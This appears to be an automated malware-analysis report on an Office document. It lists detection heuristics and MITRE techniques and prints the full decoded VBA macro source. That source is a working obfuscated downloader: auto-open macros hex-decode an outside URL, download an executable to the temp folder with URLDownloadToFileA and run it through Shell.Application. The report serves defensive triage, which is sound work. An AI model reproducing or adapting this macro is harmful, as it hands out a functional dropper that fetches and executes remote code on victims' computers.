MALICIOUS
386
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains obfuscated VBA macros that utilize the URLDownloadToFileA API, a strong indicator of downloading a secondary payload. The AutoOpen macro is present, suggesting automatic execution upon opening the document. The presence of CreateObject and Shell execution tokens further supports the malicious intent of executing downloaded content.
Heuristics 12
-
ClamAV: Doc.Downloader.Macr-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Macr-1
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 7 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _ -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E")) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E")) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865") -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5799 bytes |
SHA-256: e75a5b8a063476f1f20a0a07c77e60a759f41f41584cdb7ac76b255f6957e7f7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
62 of 100 identifiers look randomly generated (e.g. 'pJIBidfsdfgF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If
Sub pJIBidfsdfgF()
Dim eEvLrfmk As Integer
For eEvLrfmk = 0 To 3
Dim baWfWDze As Integer
For baWfWDze = 0 To 7
Dim SAYgiaqO As Integer
For SAYgiaqO = 0 To 3
DoEvents
Next SAYgiaqO
DoEvents
Next baWfWDze
Dim YqYhypAo As Integer
For YqYhypAo = 0 To 4
DoEvents
Next YqYhypAo
DoEvents
Next eEvLrfmk
Dim EEVzDOFd As Integer
For EEVzDOFd = 0 To 7
Dim zPXimGvf As Integer
For zPXimGvf = 0 To 8
DoEvents
Next zPXimGvf
DoEvents
Next EEVzDOFd
Dim pLIoZUak As Integer
For pLIoZUak = 0 To 9
DoEvents
Next pLIoZUak
dfgfdYUHKJ
End Sub
Sub AutoOpen()
Dim EbjbQDPq As Integer
For EbjbQDPq = 0 To 4
Dim CdllBhov As Integer
For CdllBhov = 0 To 7
Dim PQHZWtCI As Integer
For PQHZWtCI = 0 To 9
DoEvents
Next PQHZWtCI
DoEvents
Next CdllBhov
Dim kCQNamsp As Integer
For kCQNamsp = 0 To 5
DoEvents
Next kCQNamsp
DoEvents
Next EbjbQDPq
Dim twymuiQZ As Integer
For twymuiQZ = 0 To 9
Dim gdlbxxrS As Integer
For gdlbxxrS = 0 To 5
DoEvents
Next gdlbxxrS
DoEvents
Next twymuiQZ
Dim wwtnRgYJ As Integer
For wwtnRgYJ = 0 To 6
DoEvents
Next wwtnRgYJ
pJIBidfsdfgF
End Sub
Sub Workbook_Open()
Dim lSDSjaIX As Integer
For lSDSjaIX = 0 To 5
Dim sTDHWGDR As Integer
For sTDHWGDR = 0 To 4
Dim sRKbXAsB As Integer
For sRKbXAsB = 0 To 8
DoEvents
Next sRKbXAsB
DoEvents
Next sTDHWGDR
Dim tkwqbUkk As Integer
For tkwqbUkk = 0 To 6
DoEvents
Next tkwqbUkk
DoEvents
Next lSDSjaIX
Dim lFnJrYhI As Integer
For lFnJrYhI = 0 To 5
Dim TlJYcqhc As Integer
For TlJYcqhc = 0 To 4
DoEvents
Next TlJYcqhc
DoEvents
Next lFnJrYhI
Dim vumjzjmH As Integer
For vumjzjmH = 0 To 3
DoEvents
Next vumjzjmH
pJIBidfsdfgF
End Sub
Sub dfgfdYUHKJ()
Dim OLyhOPhV As Integer
For OLyhOPhV = 0 To 5
Dim ggfGxPRk As Integer
For ggfGxPRk = 0 To 1
Dim ZPjYCgvP As Integer
For ZPjYCgvP = 0 To 9
DoEvents
Next ZPjYCgvP
DoEvents
Next ggfGxPRk
Dim OLrUtuaF As Integer
For OLrUtuaF = 0 To 8
DoEvents
Next OLrUtuaF
DoEvents
Next OLyhOPhV
Dim lJjEgYjA As Integer
For lJjEgYjA = 0 To 2
Dim WbfHdOwR As Integer
For WbfHdOwR = 0 To 1
DoEvents
Next WbfHdOwR
DoEvents
Next lJjEgYjA
Dim RvlvZBKy As Integer
For RvlvZBKy = 0 To 7
DoEvents
Next RvlvZBKy
ioHBKJdg = HexToString("687474703A2F2F73756E66756E672E686B2F6A732F62696E2E657865")
Dim RxEAjGVp As Integer
For RxEAjGVp = 0 To 1
Dim CgfDTtIw As Integer
For CgfDTtIw = 0 To 4
Dim FgQeLJJU As Integer
For FgQeLJJU = 0 To 6
DoEvents
Next FgQeLJJU
DoEvents
Next CgfDTtIw
Dim mUycLsvf As Integer
For mUycLsvf = 0 To 2
DoEvents
Next mUycLsvf
DoEvents
Next RxEAjGVp
Dim HzKcpqDF As Integer
For HzKcpqDF = 0 To 3
Dim OMaGEVHE As Integer
For OMaGEVHE = 0 To 3
DoEvents
Next OMaGEVHE
DoEvents
Next HzKcpqDF
Dim lLycLgdt As Integer
For lLycLgdt = 0 To 2
DoEvents
Next lLycLgdt
pPPhujkfg = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
Dim DworZYei As Integer
For DworZYei = 0 To 6
Dim upqzZMmH As Integer
For upqzZMmH = 0 To 7
Dim HrUkDKOk As Integer
For HrUkDKOk = 0 To 1
DoEvents
Next HrUkDKOk
DoEvents
Next upqzZMmH
Dim sEVeUqFO As Integer
For sEVeUqFO = 0 To 7
DoEvents
Next sEVeUqFO
DoEvents
Next DworZYei
Dim DxzQCjfE As Integer
For DxzQCjfE = 0 To 6
Dim NNAFobqA As Integer
For NNAFobqA = 0 To 5
DoEvents
Next NNAFobqA
DoEvents
Next DxzQCjfE
Dim IBTxvGUe As Integer
For IBTxvGUe = 0 To 8
DoEvents
Next IBTxvGUe
R = URLDownloadToFileA(0&, ioHBKJdg, pPPhujkfg, 0&, 0&)
Dim QThZvUng As Integer
For QThZvUng = 0 To 2
Dim jBETMSlj As Integer
For jBETMSlj = 0 To 5
Dim pHJEOhLq As Integer
For pHJEOhLq = 0 To 1
DoEvents
Next pHJEOhLq
DoEvents
Next jBETMSlj
Dim kMNMqpIw As Integer
For kMNMqpIw = 0 To 2
DoEvents
Next kMNMqpIw
DoEvents
Next QThZvUng
Dim qDujcKvO As Integer
For qDujcKvO = 0 To 4
Dim WZeUslhK As Integer
For WZeUslhK = 0 To 7
DoEvents
Next WZeUslhK
DoEvents
Next qDujcKvO
Dim zQGIlsKX As Integer
For zQGIlsKX = 0 To 8
DoEvents
Next zQGIlsKX
Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open pPPhujkfg
End Sub
Public Function HexToString(ByVal jYsjanx As String) As String
Dim gTFhDP As String
Dim LdOSt As String
Dim eYqnKg As Long
For eYqnKg = 1 To Len(jYsjanx) Step 2
Dim KznwAUrB As Integer
For KznwAUrB = 0 To 7
Dim CcuMacGs As Integer
For CcuMacGs = 0 To 7
DoEvents
Next CcuMacGs
DoEvents
Next KznwAUrB
Dim tYMWohkh As Integer
For tYMWohkh = 0 To 9
DoEvents
Next tYMWohkh
gTFhDP = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(jYsjanx, eYqnKg, 2)))
Dim HdUMvIny As Integer
For HdUMvIny = 0 To 1
Dim kiZssepc As Integer
For kiZssepc = 0 To 5
DoEvents
Next kiZssepc
DoEvents
Next HdUMvIny
Dim sHZspsnX As Integer
For sHZspsnX = 0 To 7
DoEvents
Next sHZspsnX
LdOSt = LdOSt & gTFhDP
Next eYqnKg
Dim MFPIjRfh As Integer
For MFPIjRfh = 0 To 4
Dim xAlzqaHp As Integer
For xAlzqaHp = 0 To 8
DoEvents
Next xAlzqaHp
DoEvents
Next MFPIjRfh
Dim EPtelKlg As Integer
For EPtelKlg = 0 To 7
DoEvents
Next EPtelKlg
HexToString = LdOSt
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.